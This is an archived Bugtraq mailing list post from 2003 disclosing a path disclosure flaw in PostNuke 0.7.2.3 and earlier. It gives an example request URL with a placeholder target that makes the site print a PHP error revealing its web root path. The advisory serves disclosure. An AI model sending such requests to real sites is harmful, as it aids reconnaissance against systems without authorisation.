Home page logo
/

bugtraq logo Bugtraq mailing list archives

Postnuke: path disclosure (0.7.2.3 and prior)
From: "rkc" <rkc () uncompiled com>
Date: Wed, 28 May 2003 04:15:20 -0000 (GMT)

Intro.

What is PostNuke ?
PostNuke is a weblog/Content Management System (CMS).
It is far more secure and stable than competing products.

Home Page: http://www.postnuke.com

&&

A vulnerability have been found in Postnuke (v0.7.2.3-Phoenix & prior)
which allow users to determine the physical path of this cms.

This vulnerability would allow a remote user to determine the full path to
the web root directory.

Example:

http://www.[target-website].com/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=

Error:

Fatal error: Call to a member function on a non-object in
/the/full/path/public_html/modules/Sections/index.php on line 238


Cheers,

rkc


-- 
Rep. Argentina
6765656B207374796C65
StFU, and RtFM !


  By Date           By Thread  

Current thread:
  • Postnuke: path disclosure (0.7.2.3 and prior) rkc (May 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault